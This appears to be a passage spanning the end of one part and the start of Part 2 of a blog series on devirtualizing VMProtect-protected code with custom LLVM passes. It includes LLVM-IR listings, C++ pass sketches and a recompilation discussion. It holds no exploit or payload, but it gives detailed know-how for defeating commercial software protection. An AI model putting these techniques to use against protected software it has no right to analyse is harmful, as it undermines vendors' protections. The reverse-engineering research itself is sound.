define dso_local i64 @ThanksToLLVMMySonBswap64IsBack(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rax, align 8
  %2 = call i64 @llvm.bswap.i64(i64 %1)
  store i64 %2, i64* %rax, align 8
  ret i64 5368713262
}
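
For reference, the bookkeeping mentioned above could be sketched as follows; the type and field names are assumptions, not the actual pass code.

#include <cstdint>
#include "llvm/ADT/DenseMap.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/IR/Instructions.h"

// A chunk of the loaded memory slot defined by an aliasing store.
struct StoreChunk {
  llvm::StoreInst *Store; // the aliasing store instruction
  llvm::Value *Value;     // the value being stored
  uint64_t Offset;        // offset of the chunk inside the loaded slot
  uint64_t Size;          // size in bytes of the overlapping region
};

// For each load in the block, the chunks overlapping with the loaded slot;
// if they completely define it, the loaded value is rebuilt from them.
using CoalescingMap =
    llvm::DenseMap<llvm::LoadInst *, llvm::SmallVector<StoreChunk, 8>>;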

PartialOverlapDSE

This pass also falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. Again, the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.

Conceptually similar to the MemoryCoalescing pass, the goal of this pass is to sweep a function to identify chains of store instructions that post-dominate a single store instruction and kill its value before it is actually being fetched. Passes like DSE are doing a similar job, although limited to some forms of full overlapping caused by multiple stores on a single post-dominated store.

Applying the -O3 pipeline to the following example won’t remove the first 64-bit dead store at RAM[%0], even though the subsequent 64-bit stores at RAM[%0 - 4] and RAM[%0 + 4] fully overlap it, redefining its value.

define dso_local void @DSE(i64 %0) local_unnamed_addr #0 {
  %2 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %0
  %3 = bitcast i8* %2 to i64*
  store i64 1234605616436508552, i64* %3, align 1
  %4 = add i64 %0, -4
  %5 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %4
  %6 = bitcast i8* %5 to i64*
  store i64 -6148858396813837381, i64* %6, align 1
  %7 = add i64 %0, 4
  %8 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %7
  %9 = bitcast i8* %8 to i64*
  store i64 -3689348814455574802, i64* %9, align 1
  ret void
}

Adding the PartialOverlapDSE pass to the pipeline will identify and kill the first store, enabling other passes to eventually kill the chain of computations contributing to the stored value. The built-in DSE pass is most likely not executing such a kill because collecting information about multiple overlapping stores is an expensive operation.
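
A hypothetical sketch of the coverage check described above follows; the structure and names are assumptions, not the actual pass code.

#include <algorithm>
#include <cstdint>
#include <vector>

// The post-dominated store can be killed only if the later stores cover
// every byte of the interval [0, Size) it writes.
struct Interval { uint64_t Begin, End; };

bool fullyCovered(uint64_t Size, std::vector<Interval> Later) {
  std::sort(Later.begin(), Later.end(),
            [](const Interval &A, const Interval &B) { return A.Begin < B.Begin; });
  uint64_t Covered = 0;
  for (const Interval &I : Later) {
    if (I.Begin > Covered)
      return false; // a gap of the original store survives
    Covered = std::max(Covered, I.End);
  }
  return Covered >= Size;
}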

PointersHoisting

This pass is strictly related to the IsGuaranteedLoopInvariant patch I submitted; in fact it is just identifying all the pointers that can be safely hoisted to the entry block because they depend solely on values coming directly from the entry block. Applying this kind of transformation prior to the execution of the DSE pass may lead to better optimization results.
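
A minimal sketch of the hoisting criterion could look like this; the helper name and the exact check are assumptions, not the actual pass code.

#include "llvm/IR/Argument.h"
#include "llvm/IR/BasicBlock.h"
#include "llvm/IR/Constants.h"
#include "llvm/IR/Instructions.h"

// A pointer computation can be moved to the entry block when every operand
// is a constant, a function argument, or an instruction already placed in
// the entry block.
bool canHoistToEntry(llvm::Instruction *Ptr, llvm::BasicBlock &Entry) {
  for (llvm::Value *Op : Ptr->operands()) {
    if (llvm::isa<llvm::Constant>(Op) || llvm::isa<llvm::Argument>(Op))
      continue;
    auto *I = llvm::dyn_cast<llvm::Instruction>(Op);
    if (!I || I->getParent() != &Entry)
      return false;
  }
  return true;
}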

As an example, consider this devirtualized function containing a rather useless switch case. I’m saying rather useless because each store in the case blocks is post-dominated and killed by the store i32 22, i32* %85 instruction, but LLVM is not going to kill those stores until we move the pointer computation to the entry block.

define dso_local i64 @F_0x1400045b0(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rsp, align 8
  %2 = load i64, i64* %rcx, align 8
  %3 = call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1)
  %4 = extractvalue { i32, i32, i32, i32 } %3, 0
  %5 = extractvalue { i32, i32, i32, i32 } %3, 1
  %6 = and i32 %4, 4080
  %7 = icmp eq i32 %6, 4064
  %8 = xor i32 %4, 32
  %9 = select i1 %7, i32 %8, i32 %4
  %10 = and i32 %5, 16777215
  %11 = add i32 %9, %10
  %12 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @GS, i64 0, i64 96) to i64*), align 1
  %13 = add i64 %12, 288
  %14 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %13
  %15 = bitcast i8* %14 to i16*
  %16 = load i16, i16* %15, align 1
  %17 = zext i16 %16 to i32
  %18 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @RAM, i64 0, i64 5369231568) to i64*), align 1
  %19 = shl nuw nsw i32 %17, 7
  %20 = add i64 %18, 32
  %21 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %20
  %22 = bitcast i8* %21 to i32*
  %23 = load i32, i32* %22, align 1
  %24 = xor i32 %23, 2480
  %25 = add i32 %11, %19
  %26 = trunc i64 %18 to i32
  %27 = add i64 %18, 88
  %28 = xor i32 %25, %26
  br label %29

29:                                               ; preds = %37, %0
  %30 = phi i64 [ %27, %0 ], [ %38, %37 ]
  %31 = phi i32 [ %24, %0 ], [ %39, %37 ]
  %32 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %30
  %33 = bitcast i8* %32 to i32*
  %34 = load i32, i32* %33, align 1
  %35 = xor i32 %34, 30826
  %36 = icmp eq i32 %28, %35
  br i1 %36, label %41, label %37

37:                                               ; preds = %29
  %38 = add i64 %30, 8
  %39 = add i32 %31, -1
  %40 = icmp eq i32 %31, 1
  br i1 %40, label %86, label %29

41:                                               ; preds = %29
  %42 = add i64 %1, 40
  %43 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %42
  %44 = bitcast i8* %43 to i32*
  %45 = load i32, i32* %44, align 1
  %46 = add i64 %1, 36
  %47 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %46
  %48 = bitcast i8* %47 to i32*
  store i32 %45, i32* %48, align 1
  %49 = icmp ugt i32 %45, 5
  %50 = zext i32 %45 to i64
  %51 = add i64 %1, 32
  br i1 %49, label %81, label %52

52:                                               ; preds = %41
  %53 = shl nuw nsw i64 %50, 1
  %54 = and i64 %53, 4294967296
  %55 = sub nsw i64 %50, %54
  %56 = shl nsw i64 %55, 2
  %57 = add nsw i64 %56, 5368964976
  %58 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %57
  %59 = bitcast i8* %58 to i32*
  %60 = load i32, i32* %59, align 1
  %61 = zext i32 %60 to i64
  %62 = add nuw nsw i64 %61, 5368709120
  switch i32 %60, label %66 [
    i32 1465288, label %63
    i32 1510355, label %78
    i32 1706770, label %75
    i32 2442748, label %72
    i32 2740242, label %69
  ]

63:                                               ; preds = %52
  %64 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %65 = bitcast i8* %64 to i32*
  store i32 9, i32* %65, align 1
  br label %66

66:                                               ; preds = %52, %63
  %67 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %68 = bitcast i8* %67 to i32*
  store i32 20, i32* %68, align 1
  br label %69

69:                                               ; preds = %52, %66
  %70 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %71 = bitcast i8* %70 to i32*
  store i32 30, i32* %71, align 1
  br label %72

72:                                               ; preds = %52, %69
  %73 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %74 = bitcast i8* %73 to i32*
  store i32 55, i32* %74, align 1
  br label %75

75:                                               ; preds = %52, %72
  %76 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %77 = bitcast i8* %76 to i32*
  store i32 99, i32* %77, align 1
  br label %78

78:                                               ; preds = %52, %75
  %79 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %80 = bitcast i8* %79 to i32*
  store i32 100, i32* %80, align 1
  br label %81

81:                                               ; preds = %41, %78
  %82 = phi i64 [ %62, %78 ], [ %50, %41 ]
  %83 = phi i64 [ 5368709120, %78 ], [ %2, %41 ]
  %84 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %85 = bitcast i8* %84 to i32*
  store i32 22, i32* %85, align 1
  store i64 %83, i64* %rcx, align 8
  br label %86

86:                                               ; preds = %37, %81
  %87 = phi i64 [ %82, %81 ], [ 3735929054, %37 ]
  %88 = phi i64 [ 5368727067, %81 ], [ 0, %37 ]
  store i64 %87, i64* %rax, align 8
  ret i64 %88
}

When the PointersHoisting pass is applied before executing the DSE pass we obtain the following code, where the switch case has been completely removed because it has been deemed dead.

define dso_local i64 @F_0x1400045b0(i64* noalias nocapture nonnull align 8 dereferenceable(8) %0, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %1, i64* noalias nocapture nonnull align 8 dereferenceable(8) %2, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %3, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %4, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %5, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %6, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %7, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %15, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %16, i64 %17, i64 %18, i64 %19) local_unnamed_addr {
  %21 = load i64, i64* %7, align 8
  %22 = load i64, i64* %2, align 8
  %23 = tail call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1)
  %24 = extractvalue { i32, i32, i32, i32 } %23, 0
  %25 = extractvalue { i32, i32, i32, i32 } %23, 1
  %26 = and i32 %24, 4080
  %27 = icmp eq i32 %26, 4064
  %28 = xor i32 %24, 32
  %29 = select i1 %27, i32 %28, i32 %24
  %30 = and i32 %25, 16777215
  %31 = add i32 %29, %30
  %32 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @GS, i64 0, i64 96) to i64*), align 1
  %33 = add i64 %32, 288
  %34 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %33
  %35 = bitcast i8* %34 to i16*
  %36 = load i16, i16* %35, align 1
  %37 = zext i16 %36 to i32
  %38 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @RAM, i64 0, i64 5369231568) to i64*), align 1
  %39 = shl nuw nsw i32 %37, 7
  %40 = add i64 %38, 32
  %41 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %40
  %42 = bitcast i8* %41 to i32*
  %43 = load i32, i32* %42, align 1
  %44 = xor i32 %43, 2480
  %45 = add i32 %31, %39
  %46 = trunc i64 %38 to i32
  %47 = add i64 %38, 88
  %48 = xor i32 %45, %46
  %49 = add i64 %21, 32
  %50 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %49
  br label %51

51:                                               ; preds = %20, %59
  %52 = phi i64 [ %47, %20 ], [ %60, %59 ]
  %53 = phi i32 [ %44, %20 ], [ %61, %59 ]
  %54 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %52
  %55 = bitcast i8* %54 to i32*
  %56 = load i32, i32* %55, align 1
  %57 = xor i32 %56, 30826
  %58 = icmp eq i32 %48, %57
  br i1 %58, label %63, label %59

59:                                               ; preds = %51
  %60 = add i64 %52, 8
  %61 = add i32 %53, -1
  %62 = icmp eq i32 %53, 1
  br i1 %62, label %88, label %51

63:                                               ; preds = %51
  %64 = add i64 %21, 40
  %65 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %64
  %66 = bitcast i8* %65 to i32*
  %67 = load i32, i32* %66, align 1
  %68 = add i64 %21, 36
  %69 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %68
  %70 = bitcast i8* %69 to i32*
  store i32 %67, i32* %70, align 1
  %71 = icmp ugt i32 %67, 5
  %72 = zext i32 %67 to i64
  br i1 %71, label %84, label %73

73:                                               ; preds = %63
  %74 = shl nuw nsw i64 %72, 1
  %75 = and i64 %74, 4294967296
  %76 = sub nsw i64 %72, %75
  %77 = shl nsw i64 %76, 2
  %78 = add nsw i64 %77, 5368964976
  %79 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %78
  %80 = bitcast i8* %79 to i32*
  %81 = load i32, i32* %80, align 1
  %82 = zext i32 %81 to i64
  %83 = add nuw nsw i64 %82, 5368709120
  br label %84

84:                                               ; preds = %63, %73
  %85 = phi i64 [ %83, %73 ], [ %72, %63 ]
  %86 = phi i64 [ 5368709120, %73 ], [ %22, %63 ]
  %87 = bitcast i8* %50 to i32*
  store i32 22, i32* %87, align 1
  store i64 %86, i64* %2, align 8
  br label %88

88:                                               ; preds = %59, %84
  %89 = phi i64 [ %85, %84 ], [ 3735929054, %59 ]
  %90 = phi i64 [ 5368727067, %84 ], [ 0, %59 ]
  store i64 %89, i64* %0, align 8
  ret i64 %90
}

ConstantConcretization

This pass falls under the category of the generic LLVM optimization passes that are useful when dealing with obfuscated code, but basically useless, at least in the current shape, in a standard compilation pipeline. In fact, it’s not uncommon to find obfuscated code relying on constants stored in data sections added during the protection phase.

As an example, on some versions of VMProtect, when the Ultra mode is used, the conditional branch computations involve dummy constants fetched from a data section. Or if we think about a virtualized jump table (e.g. generated by a switch in the original binary), we also have to deal with a set of constants fetched from a data section.

Hence the reason for having a custom pass that, during the execution of the pipeline, identifies potential constant data accesses and converts the associated memory load into an LLVM constant (or chain of constants). This process can be referred to as constant(s) concretization.

The pass is going to identify all the load memory accesses in the function and determine if they fall in the following categories:

  • A constantexpr memory load that is using an address contained in one of the binary sections; this case is what you would hit when dealing with some kind of data-based obfuscation;
  • A symbolic memory load that is using as base an address contained in one of the binary sections and as index an expression that is constrained to a limited amount of values; this case is what you would hit when dealing with a jump table.

In both cases the user needs to provide a safe set of memory ranges that the pass can consider as read-only, otherwise the pass will restrict the concretization to addresses falling in read-only sections in the binary.

In the first case, the address is directly available and the associated value can be resolved simply by parsing the binary.
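
As a rough illustration of the first case, the core of such a pass boils down to a loop over the load instructions, concretizing the ones whose pointer operand folds to a constant address inside the @RAM array (the addressing scheme used by the lifter in this series). In the sketch below, readSectionValue and isInReadOnlySection are hypothetical helpers that respectively parse the binary sections and validate the address against the user-provided read-only ranges:

#include "llvm/IR/Constants.h"
#include "llvm/IR/Function.h"
#include "llvm/IR/Instructions.h"

using namespace llvm;

// Hypothetical helpers: read `size` bytes at `addr` from the parsed binary,
// and check that `addr` falls in a range known to be read-only.
uint64_t readSectionValue(uint64_t addr, unsigned size);
bool isInReadOnlySection(uint64_t addr);

static bool concretizeConstantLoads(Function &F) {
  bool Changed = false;
  for (BasicBlock &BB : F) {
    for (auto It = BB.begin(); It != BB.end();) {
      auto *LI = dyn_cast<LoadInst>(&*It++);
      if (!LI || !LI->getType()->isIntegerTy())
        continue;
      // Case 1: the pointer operand is a constant GEP into @RAM whose last
      // index is the absolute address of the access.
      auto *CE = dyn_cast<ConstantExpr>(LI->getPointerOperand());
      if (!CE || CE->getOpcode() != Instruction::GetElementPtr)
        continue;
      auto *Idx = dyn_cast<ConstantInt>(CE->getOperand(CE->getNumOperands() - 1));
      if (!Idx || !isInReadOnlySection(Idx->getZExtValue()))
        continue;
      // Replace the load with the constant value parsed from the binary.
      uint64_t Raw = readSectionValue(Idx->getZExtValue(),
                                      LI->getType()->getIntegerBitWidth() / 8);
      LI->replaceAllUsesWith(ConstantInt::get(LI->getType(), Raw));
      LI->eraseFromParent();
      Changed = true;
    }
  }
  return Changed;
}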

In the second case the expression computing the symbolic memory access is sliced, the constraint(s) coming from the predecessor block(s) are harvested and Souper is queried in an incremental way (conceptually similar to the one used while solving the outgoing edges in a VmBlock) to obtain the set of addresses accessing the binary. Each address is then verified to be actually lying in a binary section and the corresponding value is fetched. At this point we have a unique mapping between each address and its value, which we can turn into a selection cascade, illustrated in the following LLVM-IR snippet:

; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 2442748, i64 1465288
%96 = select i1 %91, i64 650651, i64 %95
%97 = select i1 %92, i64 2740242, i64 %96
%98 = select i1 %93, i64 1706770, i64 %97
%99 = select i1 %94, i64 1510355, i64 %98

The %99 value will hold the proper constant based on the address computed by the %89 value. The example above represents the lifted jump table shown in the next snippet, where you can notice the jump table base 0x14003E770 (5368964976) and the corresponding addresses and values:

.rdata:0x14003E770 dd 0x165BC8
.rdata:0x14003E774 dd 0x9ED9B
.rdata:0x14003E778 dd 0x29D012
.rdata:0x14003E77C dd 0x2545FC
.rdata:0x14003E780 dd 0x1A0B12
.rdata:0x14003E784 dd 0x170BD3

If we have a peek at the sliced jump condition implementing the virtualized switch case (below), this is how it looks after the ConstantConcretization pass has been scheduled in the pipeline and further InstCombine executions updated the selection cascade to compute the switch case addresses. Souper will therefore be able to identify the 6 possible outgoing edges, leading to the devirtualized switch case presented in the PointersHoisting section:

; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 5371151872, i64 5370415894
%96 = select i1 %91, i64 5369359775, i64 %95
%97 = select i1 %92, i64 5371449366, i64 %96
%98 = select i1 %93, i64 5370174412, i64 %97
%99 = select i1 %94, i64 5370219479, i64 %98
%100 = call i64 @HelperKeepPC(i64 %99) #15

Unsupported instructions

It is well known that all the virtualization-based protectors support only a subset of the targeted ISA. Thus, when an unsupported instruction is found, an exit from the virtual machine is executed (context switching to the host code), running the unsupported instruction(s) and re-entering the virtual machine (context switching back to the virtualized code).

The UnsupportedInstructionsLiftingToLLVM proof-of-concept is an attempt to lift the unsupported instructions to LLVM-IR, generating an InlineAsm instruction configured with the set of clobbering constraints and explicitly or implicitly accessed registers. An execution context structure representing the general purpose registers is employed during the lifting to feed the inline assembly call instruction with the loaded registers, and to store the updated registers after the inline assembly execution.

This approach guarantees a smooth connection between two virtualized VmStubs and an intermediate sequence of unsupported instructions, enabling some of the LLVM optimizations and better register allocation during the recompilation phase.

An example of the lifted unsupported instruction rdtsc follows:

define void @Unsupported_rdtsc(%ContextTy* nocapture %0) local_unnamed_addr #0 {
  %2 = tail call %IAOutTy.0 asm sideeffect inteldialect "rdtsc", "={eax},={edx}"() #1
  %3 = bitcast %ContextTy* %0 to i32*
  %4 = extractvalue %IAOutTy.0 %2, 0
  store i32 %4, i32* %3, align 4
  %5 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 3, i32 0
  %6 = bitcast %RegisterW* %5 to i32*
  %7 = extractvalue %IAOutTy.0 %2, 1
  store i32 %7, i32* %6, align 4
  ret void
}

An example of the lifted unsupported instruction cpuid follows:

define void @Unsupported_cpuid(%ContextTy* nocapture %0) local_unnamed_addr #0 {
  %2 = bitcast %ContextTy* %0 to i32*
  %3 = load i32, i32* %2, align 4
  %4 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 2, i32 0
  %5 = bitcast %RegisterW* %4 to i32*
  %6 = load i32, i32* %5, align 4
  %7 = tail call %IAOutTy asm sideeffect inteldialect "cpuid", "={eax},={ecx},={edx},={ebx},{eax},{ecx}"(i32 %3, i32 %6) #1
  %8 = extractvalue %IAOutTy %7, 0
  store i32 %8, i32* %2, align 4
  %9 = extractvalue %IAOutTy %7, 1
  store i32 %9, i32* %5, align 4
  %10 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 3, i32 0
  %11 = bitcast %RegisterW* %10 to i32*
  %12 = extractvalue %IAOutTy %7, 2
  store i32 %12, i32* %11, align 4
  %13 = getelementptr inbounds %ContextTy, %ContextTy* %0, i64 0, i32 1, i32 0
  %14 = bitcast %RegisterW* %13 to i32*
  %15 = extractvalue %IAOutTy %7, 3
  store i32 %15, i32* %14, align 4
  ret void
}
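
For reference, emitting such a call with the C++ API amounts to building an InlineAsm value with the proper constraint string and storing the returned registers back into the context structure. The following sketch, assuming an IRBuilder already positioned inside the helper and pointers to the EAX/EDX slots of the context structure, shows the rdtsc case:

#include "llvm/IR/IRBuilder.h"
#include "llvm/IR/InlineAsm.h"

using namespace llvm;

// Sketch: emit the rdtsc inline assembly and spill EAX/EDX into the context.
// EaxPtr and EdxPtr are assumed to point at the proper ContextTy slots.
static void emitUnsupportedRdtsc(IRBuilder<> &B, Value *EaxPtr, Value *EdxPtr) {
  LLVMContext &Ctx = B.getContext();
  Type *I32 = Type::getInt32Ty(Ctx);
  // rdtsc defines EAX and EDX, so the asm call returns a { i32, i32 } pair.
  StructType *OutTy = StructType::get(Ctx, {I32, I32});
  FunctionType *FTy = FunctionType::get(OutTy, /*isVarArg=*/false);
  InlineAsm *IA = InlineAsm::get(FTy, "rdtsc", "={eax},={edx}",
                                 /*hasSideEffects=*/true,
                                 /*isAlignStack=*/false,
                                 InlineAsm::AD_Intel);
  CallInst *Call = B.CreateCall(FTy, IA);
  // Store the two output registers back into the execution context.
  B.CreateStore(B.CreateExtractValue(Call, 0), EaxPtr);
  B.CreateStore(B.CreateExtractValue(Call, 1), EdxPtr);
}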

Recompilation

I haven’t really explored the recompilation in depth so far, because my main objective was to obtain readable LLVM-IR code, but some considerations follow:

  • If the goal is being able to execute, and eventually decompile, the recovered code, then compiling the devirtualized function using the layer of indirection offered by the general purpose register pointers is a valid way to do so. It is conceptually similar to the kind of indirection used by Remill with its own State structure. SATURN employs this technique when the stack slots and arguments recovery cannot be applied.
  • If the goal is to achieve a 1:1 register allocation, then things get more complicated because one can’t simply map all the general purpose register pointers to the hardware registers hoping for no side-effect to manifest.

The major issue to deal with when attempting a 1:1 mapping is related to how the recompilation may unexpectedly change the stack layout. This could happen if, during the register allocation phase, some spilling slot is allocated on the stack. If these additional spilling+reloading semantics are not adequately handled, some pointers used by the function may access unforeseen stack slots with disastrous results.

Results showcase

The following log files contain the output of the PoC tool executed on functions showcasing different code constructs (e.g. loop, jump table) and accessing different data structures (e.g. GS segment, DS segment, KUSER_SHARED_DATA structure):

  • 0x140001d10@DevirtualizeMe1: calling KERNEL32.dll::GetTickCount64 and literally included as nostalgia kicked in;
  • 0x140001e60@DevirtualizeMe2: executing an unsupported cpuid and with some nicely recovered llvm.fshl.i64 intrinsic calls used as rotations;
  • 0x140001d20@DevirtualizeMe2: calling ADVAPI32.dll::GetUserNameW and with a nicely recovered llvm.bswap.i64 intrinsic call;
  • 0x13001334@EMP: DllEntryPoint, calling another internal function (intra-call);
  • 0x1301d000@EMP: calling KERNEL32.dll::LoadLibraryA, KERNEL32.dll::GetProcAddress, calling other internal functions (intra-calls), executing several unsupported cpuid instructions;
  • 0x130209c0@EMP: accessing KUSER_SHARED_DATA and with nicely synthesized conditional jumps;
  • 0x1400044c0@Switches64: executing the CPUID handler and devirtualized with PointersHoisting disabled to preserve the switch case.

Searching for the @F_ pattern in your favourite text editor will bring you directly to each devirtualized VmStub, immediately preceded by the textual representation of the recovered CFG.

Afterword

I apologize for the length of the series, but I didn’t want to discard bits of information that could possibly help others approaching LLVM as a deobfuscation framework, especially knowing that, at this time, several parties are currently working on their own LLVM-based solution. I felt like showcasing its effectiveness and limitations on a well-known obfuscator was a valid way to dive through most of the details. Please note that the process described in the posts is just one of the many possible ways to approach the problem, and by no means the best way.

The source code of the proof-of-concept should be considered an experimentation playground, with everything that involves (e.g. bugs, unhandled edge cases, non production-ready quality). As a matter of fact, some of the components are barely sketched to let me focus on improving the LLVM optimization pipeline. In the future I’ll try to find the time to polish most of it, but in the meantime I hope it can at least serve as a reference to better understand the explained concepts.

Feel free to reach out with doubts, questions or even flaws you may have found in the process, I’ll be more than happy to allocate some time to discuss them.

I’d like to thank:

  • Peter, for introducing me to LLVM and working on SATURN together.
  • mrexodia and mrphrazer, for the in-depth review of the posts.
  • justmusjle, for enhancing the colors used by the diagrams.
  • Secret Club, for their suggestions and series hosting.

See you at the next LLVM adventure!

Tickling VMProtect with LLVM: Part 2

By: fvrmatteo
8 September 2021 at 23:00

This post will introduce the concepts of expression slicing and partial CFG, combining them to implement an SMT-driven algorithm to explore the virtualized CFG. Finally, some words will be spent on introducing the LLVM optimization pipeline, its configuration and its limitations.

Poor man’s slicer

Slicing a symbolic expression to be able to evaluate it, throw it at an SMT solver or match it against some pattern is something extremely common in all symbolic reasoning tools. Luckily for us this capability is trivial to implement with yet another C++ helper function. This technique has been referred to as Poor man’s slicer in the SATURN paper, hence the title of the section.

In the VMProtect context we are mainly interested in slicing one expression: the next program counter. We want to do that either while exploring the single VmBlocks (that, once connected, form a VmStub) or while exploring the VmStubs (that, once connected, form a VmFunction). The following C++ code is meant to keep only the computations related to the final value of the virtual instruction pointer at the end of a VmBlock or VmStub:

extern "C"
size_t HelperSlicePC(
  size_t rax, size_t rbx, size_t rcx, size_t rdx, size_t rsi,
  size_t rdi, size_t rbp, size_t rsp, size_t r8, size_t r9,
  size_t r10, size_t r11, size_t r12, size_t r13, size_t r14,
  size_t r15, size_t flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR)
{
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
